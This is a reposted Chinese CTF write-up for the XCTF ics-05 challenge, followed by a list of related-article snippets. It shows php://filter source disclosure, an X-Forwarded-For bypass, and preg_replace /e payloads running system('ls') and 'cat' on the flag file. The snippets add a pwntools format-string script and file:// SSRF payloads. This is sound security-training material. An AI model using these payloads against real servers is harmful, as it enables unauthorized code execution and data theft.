[CTF]文件包含(php伪协议)+代码执行(XCTF 4th-CyberEarth)

最新推荐文章于 2024-07-19 14:54:41 发布
最新推荐文章于 2024-07-19 14:54:41 发布
阅读量823 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/-mo-/p/11572416.html
版权

原作者:admin

[原理]
文件包含读源码、x-forwarded-for

preg_replace 函数执行一个正则表达式的搜索和替换,preg_replce正则表达式部分包含e参数的时候,进行替换的部分会被执行。

[目的]
掌握正则表达式、伪协议读取源码

[环境]
windows

[工具]
firefox、burp

[步骤]
1.进入云平台设备维护中心页面,利用php伪协议读取源码。

http://111.198.29.45:44740/index.php?page=php://filter/convert.base64-encode/resource=index.php

2.将得到的源码进行base64解密处理,获取到index.php的源码,在121行可以发现后门,如图所示。

1561366-20190923145832141-871038246.png

3.对此段代码进行审计,可以发现需要将X_FORWARDED_FOR设置为127.0.0.1,并且用get方式传递三个参数传递给preg_replace函数。

这里介绍一下preg_replace函数:

1561366-20190923150059486-299241198.png

其实就是PHP里的正则表达式,这里可以用/(.*)/e,preg_replace函数可以进行代码执行的:

1561366-20190925111134869-1178487910.png

不过还要注意一点:
1561366-20190925111224550-1796231450.png

4.使用burp修改http请求头参数,添加X_FORWARDED_FOR,将url设置为

/index.php?pat=/(.*)/e&rep=system('ls')&sub=aa 可以查看文件列表,如图所示。

1561366-20190923145842291-635491969.png

5.将url设置为 /index.php?pat=/(.*)/e&rep=system('ls+s3chahahaDir')&sub=aa 查看s3chahahaDir文件夹,发现flag文件夹。

6.将url设置为 /index.php?pat=/(.*)/e&rep=system('ls+s3chahahaDir/flag')&sub=aa 查看flag文件夹,发现flag.php文件。

7.将url设置为 /index.php?pat=/(.*)/e&rep=system('cat+s3chahahaDir/flag/flag.php')&sub=aa 查看flag,如图所示。

1561366-20190923145853744-1097861810.png

转载于:https://www.cnblogs.com/-mo-/p/11572416.html

baguangman5501
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【愚公系列】2024年03月 《CTF实战:从入门到提升》 010-Web安全入门(PHP代码执行漏洞)
时光隧道
03-28 5万+
PHP代码执行漏洞是一种常见的安全漏洞,也被称为远程代码执行(Remote Code Execution,RCE)漏洞。这种漏洞的发生通常是由于程序员在编写代码时未正确过滤用户输入,导致用户能够将恶意代码插入到应用程序中,然后被解释器执行。攻击者可以利用这种漏洞执行任意代码,从而获取系统权限、窃取数据或者对系统进行进一步的攻击。未过滤用户输入:开发者在使用用户输入时必须进行严格的输入验证和过滤,避免直接将用户输入作为代码执行。eval() 和 exec() 函数。
XCTF攻防世界题目ics-04(XCTF 4th-CyberEarth)
daqiangdetianxia的博客
08-18 475
为了避免眼高手低,能用手工我决定把一些题目的详细思路和思考过程写一遍。就当是总结吧。 简单的一道sql注入题目一个简单的逻辑漏洞。 信息搜集 页面:login.php,register.php,findpwd.php 服务器:Apache/2.4.7 (Ubuntu) ICS工业控制系统 漏洞查找 一、 经过测试,发现findpwd页面存在sql注入漏洞 二、手工注入 1.确定列数 admin1' order by 4#经过测试,一共有四列,其中admin1是我自己注册的用户。 2.确定注入列数. .
[BMZCTF-pwn] 01-XCTF 4th-CyberEarth
weixin_52640415的博客
02-12 205
给了个后门,pie未开,直接通过printf漏洞将key写为指定值即可。 from pwn import * p = remote('www.bmzclub.cn', 21355) context(arch='i386', log_level = 'debug') payload = fmtstr_payload(12, {0x0804a048: 35795746}) #key = xxxx p.sendline(payload) p.interactive() ...
ctfphp反序列化汇总
最新发布
2302_78903258的博客
07-19 1364
解题过程:首先需要找到最后的危险函数,看到了在Vox里面的include。然后想要使用include就要调用fun这个函数想要调用fun就要触发__invoke这个魔术方法__invoke() //当脚本尝试将对象调用为函数时触发作为函数就是添了一个小括号去触发,发现在Petal类中__get方法具备这个调用函数的功能,所以需要去触发__get这个方法。
[XCTF 4th-CyberEarth]ics-05
sGanYu
08-26 2183
其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 打开题目,是一个工控云管理系统,随意点击旁边的菜单,发现只有设备维护中心可以正常进入 无意间点击左上角‘云平台设备维护中心’之后,发现页面进行跳转,page=index 将URL内的index改为任何字符,页面都会进行回显 在index后添一个.php,页面回显ok,说明index.php存在,可以尝试读取一下 这里需要用到php://filter协议读内容 php://filter/read=conver..
CTF 文件包含伪协议
weixin_30810583的博客
11-06 871
正巧在写代码审计的文章,无意间看到了一篇CTF代码审计CTF题目很好,用的姿势正如标题,文件包含伪协议。 先放出原文链接(http://www.freebuf.com/column/150028.html) 题目源自国外某挑战平台,平台上还有许多其他有趣的challenges题目。 站点地址:http://chall.tasteless.eu/ 这次的题目链接:http://leve...
ctf文件包含
qq_52671379的博客
06-14 634
ctf文件包含 题目 鼓捣一下发现一个链接shell 意思是可通过ctfhub传值 看一下代码发现看到eval函数,将请求的参数作为命令执行。可是txt文件是无法利用的,所以想到刚才的index页面中,有一个include函数通过get提交,会将shell.txt的内容合并到index.php中,尝试post提交ctfhub的值,发现被执行了,然后输出了当下目录的文件。 Flag在文件file通过get传值会被include函数将文件的内容合并到index.php中 首先将文件给到shell.tet
CTF fuzz 文件包含 php伪协议
baynk的博客
03-22 1224
一开始就需要fuzz。 先随意构造两个参数,丢到burpsuite中,构造两个是因为跑得快些。。。 这里模式记得换下,用Pitchfork,fuzz的地方也不要用错了。 第一个payload值。 第二个payload值 gogogo等结果吧。 路径应该是path了。。。 确实是OK的,那这里用php伪协议来找文件路径了。 本来想用php://input读目录文件的,但是好像有点问题,所...
文件包含-xctf-warmup
qq_43660551的博客
07-10 788
启动环境,发现只有一个滑稽。也没什么别的信息。f12看下。发现有个source.php。访问下看看。发现一堆代码。审计代码。 ,然后再判断一次 绕过思路:以file作为请求的参数(利用file协议),构造payload,满足:(1)file不为空且在白名单中,或者file参数中的?之前的子字符串在白名单中,也就是说为source.php或者hint.php。(2)知道ffffllllaaaagggg的路径,或者用“../”进行目录穿越。
ctf xor题_从一道CTF题目谈PHP中的命令执行
weixin_42228796的博客
02-23 363
快睡的时候,打开B站发现有位用户留言,大意就是让我帮忙看一道题,正好当时有空,于是就打开了他发的链接,代码如下 很明显是一道PHP代码审计的题目,而且只需要绕过第三行的if即可进行任意命令执行。解决思路看了代码之后觉得是道普通的题目,对于/a-zA-Z/这个正则表达式,我们可以利用PHP动态函数的特性,构造出字符串即可。对于想要的字符串,我们可以通过以下三种方式来构造:1. 异或对于PHP中的字符...
ctfhub-伪协议读取文件
m0_62094846的博客
11-06 1502
要我们读取flag.php 这道题,先要知道几个伪协议 file:// php://input(执行php代码) php://filter(读取源码) zip://(压缩文件) data://(执行php代码) 使用这个读不出来,php://filter/read=convert.base64-encode/resource=flag.php 查了一下,这个是文件包含中的,不能用于ssrf 一般网站的目录都放在www/html/目录下,使用file:///var/www/html...
CTFHub技能树 Web-SSRF 伪协议读取文件
Senimo
07-01 820
CTFHub技能树 Web-SSRF 伪协议读取文件 hint:尝试去读取一下Web目录下的flag.php吧 启动环境,页面空白,查看 URL: http://challenge-d8a780b03b135e05.sandbox.ctfhub.com:10800/?url=_ 题目说明使用伪协议读取 flag,也给出了提示为 Web 目录,尝试构造 Payload,使用file协议读取文件: file:///var/www/html/flag.php 带入到 GET 传参中,查看网页源码,得到 fla
[ZJCTF 2019]NiZhuanSiWei(伪协议读取文件)
qq_44111753的博客
02-02 493
0x01 知识点 1、data协议用于数据流的读取 data://text/plain;base64,xxxx(base64编码后的数据) data伪协议只有在php<5.3且allow_url_fopen :on,allow_url_include:on时可以写木马。 2、php伪协议:可结合文件包含漏洞读取文件源码或执行文件 需要开启allow_url_fopen的:php://input、php://stdin、php://memory和php://temp 不需要开启allow_wrl_fo
一些CTFphp可利用的函数和一些正则表达式的绕过方法
m0_75066605的博客
03-26 1406
整理的一些CTFphp可利用的函数和一些正则表达式的绕过方法
CTF-文件包含(持续更新)
m0_74317362的博客
07-28 1234
任意文件包含漏洞处理方法和实例
CTF文件包含&伪协议
wikey 的博客
03-29 277
我们都知道require_once在调用时php会检查该文件是否已经被包含过,而这里在前面就已经包含了文件,我们在后面再想包含’flag.php’时就不能实现了,而我们需要做到就是怎么绕过这个哈希表,让php认为我们传入的文件名不在哈希表中,又可以让php能找到这个文件,读取到内容。require:包含并运行指定的文件,包含文件发生错误时,程序直接终止执行。因为 php文件包含机制是将已经包含的文件与文件的真实路径放进哈希表中。的符号链接,想到这里,用伪协议配合多级符号链接的办法进行绕过。
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)
2401_84208172的博客
05-24 1461
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议),该题考察文件包含漏洞,涉及PHP伪协议data伪协议file伪协议PHP内置函数等知识点,希望读者躬身实践。黑客&网络安全如何学习。
攻防世界CTF —— PHP本地文件包含漏洞解题思路
weixin_47610939的博客
07-27 4153
攻防世界的CTF web类题目,关于php本地文件包含漏洞的解题思路
PHP伪协议文件包含漏洞分析 - Zad的博客园实战
PHP文件包含漏洞通常发生在代码中使用了类似`include`或`require`等函数,它们可以动态地载和执行文件。当这些函数的参数来自不受信任的源,比如用户输入时,攻击者可能通过构造特殊的输入来尝试包含服务器上的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值